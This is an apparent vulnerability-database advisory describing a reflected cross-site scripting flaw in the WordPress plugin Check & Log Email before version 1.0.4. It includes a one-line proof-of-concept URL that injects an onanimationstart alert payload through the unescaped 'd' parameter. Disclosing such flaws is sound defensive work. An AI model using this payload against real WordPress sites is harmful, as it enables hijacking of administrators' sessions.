Lucene search

K
wpvulndbJrXnmWPVDB-ID:77F50129-4B1F-4E50-8321-9DD32DEBA6E1
HistoryNov 01, 2021 - 12:00 a.m.

Check & Log Email < 1.0.4 - Reflected Cross-Site Scripting

2021-11-0100:00:00
JrXnm
wpscan.com
9
plugin
reflected cross-site scripting
enable logs
attribute
poc
animation
alert
software

EPSS

0.001

Percentile

43.6%

The plugin does not escape the d parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting

PoC

With the “Enable Logs” setting activated: https://example.com/wp-admin/admin.php?page=check-email-logs&amp;d;="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

EPSS

0.001

Percentile

43.6%

Related for WPVDB-ID:77F50129-4B1F-4E50-8321-9DD32DEBA6E1